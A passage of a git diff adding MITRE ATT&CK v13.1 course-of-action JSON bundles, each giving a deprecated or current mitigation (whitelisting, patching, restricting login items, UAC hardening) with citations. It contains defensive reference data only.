\u201cignoredup\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72.json new file mode 100644 index 0000000000000000000000000000000000000000..b3b6fb02ca7abfb62613cc316739cf9c0e3fe295 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--470544ee-687d-477d-812b-e81a7a694bc5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--0472af99-f25c-4abe-9fce-010fa3450e72", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1081", + "external_id": "T1081" + }, + { + "source_name": "Microsoft MS14-025", + "description": "Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved January 28, 2015.", + "url": "http://support.microsoft.com/kb/2962486" + } + ], + "modified": "2019-07-24T18:12:19.081Z", + "name": "Credentials in Files Mitigation", + "description": "Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences. (Citation: Microsoft MS14-025)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31.json new file mode 100644 index 0000000000000000000000000000000000000000..f3999035b3aab9dbec81eac2e1324261a98a18dc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--eeb60fc1-4121-42ec-b150-de773cc6cc86", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--06160d81-62be-46e5-aa37-4b9c645ffa31", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1212", + "external_id": "T1212" + }, + { + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/", + "description": "Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.", + "source_name": "Ars Technica Pwn2Own 2017 VM Escape" + }, + { + "url": "https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/", + "description": "Nunez, N. (2017, August 9). Moving Beyond EMET II \u2013 Windows Defender Exploit Guard. Retrieved March 12, 2018.", + "source_name": "TechNet Moving Beyond EMET" + }, + { + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity", + "description": "Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.", + "source_name": "Wikipedia Control Flow Integrity" + } + ], + "modified": "2019-07-24T19:23:33.259Z", + "name": "Exploitation for Credential Access Mitigation", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. 
Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nSecurity applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b.json new file mode 100644 index 0000000000000000000000000000000000000000..1857e0e1fcd54d791059369ba4dcde15c25f223e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b.json 
@@ -0,0 +1,57 @@
+{
+ "type": "bundle",
+ "id": "bundle--734adc9d-acc5-4c2e-98ac-3142c65bd832",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "T1012",
+ "url": "https://attack.mitre.org/mitigations/T1012",
+ "source_name": "mitre-attack"
+ },
+ {
+ "source_name": "Beechey 2010",
+ "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.",
+ "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599"
+ },
+ {
+ "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.",
+ "source_name": "Windows Commands JPCERT"
+ },
+ {
+ "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.",
+ "source_name": "NSA MS AppLocker"
+ },
+ {
+ "source_name": "Corio 2008",
+ "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.",
+ "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx"
+ },
+ {
+ "source_name": "TechNet Applocker vs SRP",
+ "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.",
+ "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx"
+ }
+ ],
+ "modified": "2020-01-17T16:45:24.641Z",
+ "name": "Query Registry Mitigation",
+ "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885.json
new file mode 100644
index 0000000000000000000000000000000000000000..072dca8094d31c756e4f45582e6e986988f1fc57
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--7a621d39-4492-46b5-b2ab-66a9524f8707",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1162",
+ "external_id": "T1162"
+ },
+ {
+ "url": "https://support.apple.com/en-us/HT204005",
+ "description": "Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017.",
+ "source_name": "Re-Open windows on Mac"
+ }
+ ],
+ "modified": "2019-07-24T19:49:43.716Z",
+ "name": "Login Item Mitigation",
+ "description": "Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically (Citation: Re-Open windows on Mac).",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19.json
new file mode 100644
index 0000000000000000000000000000000000000000..4a3b3bb47044f0438e14ede5664791d0a0979cdf
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19.json
@@ -0,0 +1,32 @@
+{
+ "type": "bundle",
+ "id": "bundle--057597b1-832f-4d62-b43f-d9f1778b4b04",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--073cc04d-ac46-4f5a-85d7-83a91ecd6a19",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1166",
+ "external_id": "T1166"
+ }
+ ],
+ "modified": "2019-07-25T11:43:19.870Z",
+ "name": "Setuid and Setgid Mitigation",
+ "description": "Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2.json
new file mode 100644
index 0000000000000000000000000000000000000000..3b46ae856926661c29587a5dc1e1652605649ce9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--02610a06-1971-45d0-8632-6fb2bf51864c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--08e02f67-ea09-4f77-a70b-414963c29fc2",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1223",
+ "external_id": "T1223"
+ },
+ {
+ "url": "https://live.paloaltonetworks.com/t5/Ignite-2016-Blog/Breakout-Recap-Cybersecurity-Best-Practices-Part-1-Preventing/ba-p/75913",
+ "description": "Kiwi. (2016, April 6). Breakout Recap: Cybersecurity Best Practices Part 1 - Preventing Opportunistic Attacks. Retrieved October 3, 2018.",
+ "source_name": "PaloAlto Preventing Opportunistic Attacks Apr 2016"
+ }
+ ],
+ "modified": "2019-07-24T14:19:23.148Z",
+ "name": "Compiled HTML File Mitigation",
+ "description": "Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files. (Citation: PaloAlto Preventing Opportunistic Attacks Apr 2016) Also consider using application whitelisting to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259.json
new file mode 100644
index 0000000000000000000000000000000000000000..6a9160e4dfe0f701ba18aafce758643e373b166f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--2e5ff902-a0db-4a4a-9cac-a549df452347",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--0bc3ce00-83bc-4a92-a042-79ffbc6af259",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1084",
+ "external_id": "T1084"
+ },
+ {
+ "source_name": "FireEye WMI 2015",
+ "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf"
+ }
+ ],
+ "modified": "2019-07-25T12:35:09.565Z",
+ "name": "Windows Management Instrumentation Event Subscription Mitigation",
+ "description": "Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1022138b-497c-40e6-b53a-13351cbd4090.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1022138b-497c-40e6-b53a-13351cbd4090.json
new file mode 100644
index 0000000000000000000000000000000000000000..3ee5ef26d40bd902c9e43b0d11928b51fc124d2b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1022138b-497c-40e6-b53a-13351cbd4090.json
@@ -0,0 +1,57 @@
+{
+ "type": "bundle",
+ "id": "bundle--444ad1b5-fb7c-4bf4-8562-49aa031cd4ce",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--1022138b-497c-40e6-b53a-13351cbd4090",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "T1044",
+ "url": "https://attack.mitre.org/mitigations/T1044",
+ "source_name": "mitre-attack"
+ },
+ {
+ "url": "https://github.com/mattifestation/PowerSploit",
+ "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.",
+ "source_name": "Powersploit"
+ },
+ {
+ "source_name": "Beechey 2010",
+ "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.",
+ "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599"
+ },
+ {
+ "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html",
+ "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.",
+ "source_name": "Windows Commands JPCERT"
+ },
+ {
+ "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.",
+ "source_name": "NSA MS AppLocker"
+ },
+ {
+ "url": "http://seclists.org/fulldisclosure/2015/Dec/34",
+ "description": "Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe\tallows remote code execution with escalation of privilege. Retrieved March 10, 2017.",
+ "source_name": "Seclists Kanthak 7zip Installer"
+ }
+ ],
+ "modified": "2021-08-23T20:25:21.486Z",
+ "name": "File System Permissions Weakness Mitigation",
+ "description": "Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses. (Citation: Powersploit)\n\nIdentify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able. (Citation: Seclists Kanthak 7zip Installer)\n\nTurn off UAC's privilege elevation for standard users [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]to automatically deny elevation requests, add: \"ConsentPromptBehaviorUser\"=dword:00000000 (Citation: Seclists Kanthak 7zip Installer). Consider enabling installer detection for all users by adding: \"EnableInstallerDetection\"=dword:00000001. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: \"EnableInstallerDetection\"=dword:00000000. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--10571bf2-8073-4edf-a71c-23bad225532e.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--10571bf2-8073-4edf-a71c-23bad225532e.json
new file mode 100644
index 0000000000000000000000000000000000000000..b8f37d2f8d1a2067384c491bf90f14be0f8b7c3a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--10571bf2-8073-4edf-a71c-23bad225532e.json
@@ -0,0 +1,47 @@
+{
+ "type": "bundle",
+ "id": "bundle--845394b1-952b-4757-b8e6-c78ef5fd7c63",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--10571bf2-8073-4edf-a71c-23bad225532e",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "T1103",
+ "url": "https://attack.mitre.org/mitigations/T1103",
+ "source_name": "mitre-attack"
+ },
+ {
+ "source_name": "Beechey 2010",
+ "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.",
+ "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599"
+ },
+ {
+ "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.",
+ "source_name": "Windows Commands JPCERT"
+ },
+ {
+ "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.",
+ "source_name": "NSA MS AppLocker"
+ }
+ ],
+ "modified": "2020-01-17T16:45:23.250Z",
+ "name": "AppInit DLLs Mitigation",
+ "description": "Upgrade to Windows 8 or later and enable secure boot.\n\nIdentify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13.json
new file mode 100644
index 0000000000000000000000000000000000000000..77ab41df2108468b664c02923b84b0369d352f87
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13.json
@@ -0,0 +1,32 @@
+{
+ "type": "bundle",
+ "id": "bundle--7e7f0180-1377-48f2-9636-55dead0da4d2",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1159",
+ "external_id": "T1159"
+ }
+ ],
+ "modified": "2019-07-24T19:47:59.038Z",
+ "name": "Launch Agent Mitigation",
+ "description": "Restrict user's abilities to create Launch Agents with group policy.",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c.json
new file mode 100644
index 0000000000000000000000000000000000000000..5e0b09aad8c4955ac496d3f54552313f5b68f8fb
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c.json
@@ -0,0 +1,31 @@
+{
+ "type": "bundle",
+ "id": "bundle--b944638f-f933-4578-8222-b1950b683e41",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c",
+ "type": "course-of-action",
+ "created": "2019-06-10T20:46:02.263Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "M1031",
+ "url": "https://attack.mitre.org/mitigations/M1031"
+ }
+ ],
+ "modified": "2019-06-10T20:46:02.263Z",
+ "name": "Network Intrusion Prevention",
+ "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432.json
new file mode 100644
index 0000000000000000000000000000000000000000..90942e64ef865cb238efbea0ab4ca57d8d7eea21
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432.json
@@ -0,0 +1,37 @@
+{
+ "type": "bundle",
+ "id": "bundle--e6b115c0-1e8c-45b3-be5f-6cf2c01a23ae",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--12c13879-b7bd-4bc5-8def-aacec386d432",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1117",
+ "external_id": "T1117"
+ },
+ {
+ "url": "https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET",
+ "description": "National Security Agency. (2016, May 4). Secure Host Baseline EMET. Retrieved June 22, 2016.",
+ "source_name": "Secure Host Baseline EMET"
+ }
+ ],
+ "modified": "2019-07-25T11:32:22.755Z",
+ "name": "Regsvr32 Mitigation",
+ "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET)",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43.json
new file mode 100644
index 0000000000000000000000000000000000000000..abd6c59ec2be04324d30a765a3c6775f05c000f9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43.json
@@ -0,0 +1,32 @@
+{
+ "type": "bundle",
+ "id": "bundle--878a4024-43c2-4110-b900-8db0781b6d0e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43",
+ "type": "course-of-action",
+ "created": "2018-10-17T00:14:20.652Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/mitigations/T1147",
+ "external_id": "T1147"
